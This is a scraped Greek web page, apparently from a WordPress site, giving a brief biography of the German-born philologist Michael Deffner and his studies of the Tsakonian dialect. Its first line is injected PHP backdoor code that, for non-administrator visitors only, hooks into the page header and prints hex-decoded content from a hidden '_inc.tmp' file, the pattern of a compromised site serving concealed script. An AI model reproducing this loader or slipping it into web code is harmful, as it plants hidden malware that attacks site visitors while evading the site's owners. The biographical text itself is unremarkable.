if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Μιχαήλ Δέφνερ |
Get Adobe Flash player

Αναζήτηση

Ιστορικό

Μιχαήλ Δέφνερ – Michael Deffner
1848-1934



»»» Γερμανός φιλόλογος, γλωσσολόγος, νεοελληνιστής και αρχαιολόγος ( Ντονάουβερτ 1848 – Αθήνα 1934). Σπούδασε στο Μόναχο και στη συνέχεια στη Λειψία. Εγκαταστάθηκε στην Αθήνα το 1871 και έλαβε την ελληνική υπηκοότητα. Διορίστηκε ως καθηγητής της Λατινικής και της Γερμανικής Γλώσσας. Στη συνέχεια διορίστηκε υφηγητής της Συγκριτικής Γλωσσολογίας και της Λατινικής Φιλολογίας στο Πανεπιστήμιο Αθηνών και υποδιευθυντής της Εθνικής Βιβλιοθήκης της Ελλάδος.

Το επιστημονικό του έργο αναφέρεται κυρίως στη μελέτη της Τσακωνικής διαλέκτου, της οποίας απέδειξε την αρχαιότητα και την καταγωγή από την αρχαία λακωνική διάλεκτο. Δημοσίευσε την “Τσακώνικη Γραμματική” (Α’ μέρος, Βερολίνο 1881. Το Β’ μέρος δε δημοσιεύθηκε ποτέ), πολλά άρθρα λαογραφικού και γλωσσολογικού περιεχομένου σχετικά με τους Τσάκωνες και την Τσακωνική και τέλος το “Λεξικό της Τσακώνικης Διαλέκτου” (Αθήνα 1923).

Τέλος το “Λεξικό της Τραπεζουντιακής Διαλέκτου” που συνέταξε παραμένει ανέκδοτο.

Λέξεις Κλειδιά σε αναζητήσεις: